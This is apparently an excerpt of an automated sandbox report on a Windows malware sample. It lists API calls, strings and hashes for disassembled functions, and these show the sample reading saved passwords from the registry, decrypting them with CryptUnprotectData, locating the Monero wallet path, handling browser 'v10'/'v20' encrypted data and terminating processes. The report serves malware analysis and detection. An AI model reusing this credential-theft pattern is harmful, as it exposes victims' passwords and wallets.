                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                              • Instruction ID: fbfebca6a7e022a2d15a14d88e0a100cdfe6c937fd8e512e0cf152da6542e642
                              • Opcode Fuzzy Hash: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                              • Instruction Fuzzy Hash: 37419271A01605AFDF21DF65DC4AFAE77B8EB54701F004458FA05EB280EF70AD449BA4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003A4F39), ref: 003B4545
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B454C
                              • wsprintfW.USER32 ref: 003B455B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003B45CA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003B45D9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 003B45E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                              • String ID: 9O:$%hs$9O:
                              • API String ID: 885711575-419449927
                              • Opcode ID: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                              • Instruction ID: 9fd1f31ca9e313a80409a7cddbf2fe3886522889ad2b258ca7b3d7b2da920622
                              • Opcode Fuzzy Hash: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                              • Instruction Fuzzy Hash: 05317072A00A09BFDB21DBA4DC49FEE7778FF55704F104059F605E7180DB70AA458BA9
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039BC1F
                              • lstrlen.KERNEL32(00000000), ref: 0039BC52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BC7C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039BC84
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BCAC
                              • lstrlen.KERNEL32(003C4AD4), ref: 0039BD23
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                              • Instruction ID: 1932afd748f7e9713152dc5d5809b743c7b7d21e9ed7de9fafa65592a3b8ef6a
                              • Opcode Fuzzy Hash: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                              • Instruction Fuzzy Hash: 92A17F31A01605DFCF26EF69EA49EAEB7B4BF54304F1A8069E406DB261DB31DC45CB90
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5F2A
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5F49
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 003B6014
                              • memmove.MSVCRT(00000000,00000000,?), ref: 003B609F
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B60D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                              • Instruction ID: 9167fea908933a59310a692e595758374343b535f394e648a2ab166d2092c174
                              • Opcode Fuzzy Hash: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                              • Instruction Fuzzy Hash: 7F61A370714504DBDB1ADF5DC8D1AAEF3B6EF84308B244919E692CBB82D731ED808B55
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                              • lstrcat.KERNEL32(?,?), ref: 003AE098
                              • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                              • lstrcat.KERNEL32(?,00F1A748), ref: 003AE0C0
                              • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                              • lstrcat.KERNEL32(?,00F2E118), ref: 003AE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                              • Instruction ID: 5f2482f59ba2a162656e24895b4c6fc66f75c7f89094722d92070141b1185fe1
                              • Opcode Fuzzy Hash: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                              • Instruction Fuzzy Hash: C6416B72911528AFCF26EB64DC49ADE73B4BF58300F0149A4B90AA7251DF309F899F90
                              APIs
                                • Part of subcall function 003977D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                                • Part of subcall function 003977D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                                • Part of subcall function 003977D0: StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                • Part of subcall function 003977D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                                • Part of subcall function 003977D0: HeapFree.KERNEL32(00000000), ref: 003978F3
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397A90
                              • lstrcat.KERNEL32(00000000,?), ref: 00397ABD
                              • lstrcat.KERNEL32(00000000, : ), ref: 00397ACF
                              • lstrcat.KERNEL32(00000000,?), ref: 00397AF0
                              • wsprintfA.USER32 ref: 00397B10
                              • lstrcpy.KERNEL32(00000000,?), ref: 00397B39
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00397B47
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397B60
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                              • Instruction ID: b06bf037cbf78dce8d0762df2f6c2abd45a86b5dd42f741faa44340ebcb7b67a
                              • Opcode Fuzzy Hash: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                              • Instruction Fuzzy Hash: 8531C376A24618EFCF12DBA8DC48EAFB779FB94300B150519E506A3340DB70ED49DBA0
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A820C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8243
                              • lstrlen.KERNEL32(00000000), ref: 003A8260
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8297
                              • lstrlen.KERNEL32(00000000), ref: 003A82B4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A82EB
                              • lstrlen.KERNEL32(00000000), ref: 003A8308
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8337
                              • lstrlen.KERNEL32(00000000), ref: 003A8351
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8380
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: ec915264f9e5849a3bdfd9e527eef00c3f01cd2eb92ae3a0600bf071098d17c0
                              • Instruction ID: 91c26da4a396df38f032c284da7dff09f1b778d359899744ab9a92507ab4cddc
                              • Opcode Fuzzy Hash: ec915264f9e5849a3bdfd9e527eef00c3f01cd2eb92ae3a0600bf071098d17c0
                              • Instruction Fuzzy Hash: F2518079901A029FDF16DF69D868A6BB7A8EF05700F064514ED06DB284DF30ED61CBD0
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                              • StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                • Part of subcall function 00397750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                                • Part of subcall function 00397750: RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                                • Part of subcall function 00397750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                                • Part of subcall function 00397750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                                • Part of subcall function 00397750: LocalFree.KERNEL32(?), ref: 003977B7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                              • HeapFree.KERNEL32(00000000), ref: 003978F3
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00397A35
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: 6d8d9dfdec449ea2dd57c40fd28202585d65ab9b29cc835c4823733d36b3da07
                              • Instruction ID: 1304510fc6da6fca7af197502d1d0119c3053fe748d79a6a36114c40bdb5ed1c
                              • Opcode Fuzzy Hash: 6d8d9dfdec449ea2dd57c40fd28202585d65ab9b29cc835c4823733d36b3da07
                              • Instruction Fuzzy Hash: 33713FB1D0021DAFDF10DF95CC81AEEBBB8EF45300F1445A9E509E7240EB315A89CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                              • RegCloseKey.ADVAPI32(?), ref: 0039117D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 0039114F
                              • wallet_path, xrefs: 0039116D
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                              • Instruction ID: fcfe0044d8c5aee3840d2ee4a6069c6eb20c3597b629a60ff7ce0a44b6f8d188
                              • Opcode Fuzzy Hash: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                              • Instruction Fuzzy Hash: E3F03075640309BFD7109BE49C4DFEA7B7CEB14715F100159FE05E2281E6B05A58A7A0
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00399E04
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00399E42
                              • LocalAlloc.KERNEL32(00000040), ref: 00399EA7
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • lstrcpy.KERNEL32(00000000,003C4C48), ref: 00399FB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: f57e94b33d9114a79e59531b4543c40dd498169c97f4d42a02c31715c6542c77
                              • Instruction ID: 18502321e5b7152c7b6c3ad9fd13f0bdb9de74140305a04567a21dab6ff4e27d
                              • Opcode Fuzzy Hash: f57e94b33d9114a79e59531b4543c40dd498169c97f4d42a02c31715c6542c77
                              • Instruction Fuzzy Hash: 0051B032A11209ABCF12EF68DC85BDEB7A8EF54315F154029F90AEF251DB70ED158B90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0039565A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00395661
